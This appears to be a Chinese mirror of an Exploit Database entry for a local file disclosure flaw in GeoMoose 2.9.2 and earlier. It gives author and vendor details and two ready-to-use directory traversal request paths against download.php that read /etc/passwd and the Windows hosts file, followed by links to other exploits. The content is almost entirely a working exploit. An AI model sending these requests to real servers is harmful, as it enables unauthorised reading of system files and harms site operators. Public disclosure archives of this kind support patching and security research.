GeoMoose < 2.9.2 - Directory Traversal

Exploit Database
21 阅读

作者： Sander Ferdinand

日期： 2017-04-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41822/

# Exploit Title: GeoMoose <= 2.9.2 Local File Disclosure
# Exploit Author: Sander 'dsc' Ferdinand
# Date: 2017-03-4
# Version: <= 2.9.2
# Blog: https://ced.pwned.systems/advisories-geomoose-local-file-disclosure-2-9-2.html
# Vendor Homepage: geomoose.org
# Reported: 4-3-2017
# Vendor response: http://osgeo-org.1560.x6.nabble.com/Geomoose-users-GeoMoose-Security-Issue-td5315873.html
# Software Link: https://github.com/geomoose/geomoose
# Tested on: Windows/Linux
# CVE : none

/php/download.php?id=foo/.&ext=/../../../../../../../etc/passwd
/php/download.php?id=foo/.&ext=/../../../../../../../WINDOWS/system32/drivers/etc/hosts

last Exploits
GeoMoose < 2.9.2 - Directory Traversal的更多信息

WordPress Plugin PayPal Checkout Payment Gateway 1.6.8 – Parameter Tampering：
Cab Booking Script 1.0 – ‘city’ SQL Injection：
Pligg CMS 2.0.2 – Multiple SQL Injections：
Stradus CMS 1.0beta4 – Multiple Vulnerabilities：
MYRE Realty Manager – Multiple Vulnerabilities：
TestBox CFML Test Framework 4.1.0 – Arbitrary File Write and Remote Code Execution：
QiHang Media Web Digital Signage 3.0.9 – Unauthenticated Arbitrary File Deletion：
IBM Websphere ILOG JRules 6.7 – Cross-Site Scripting：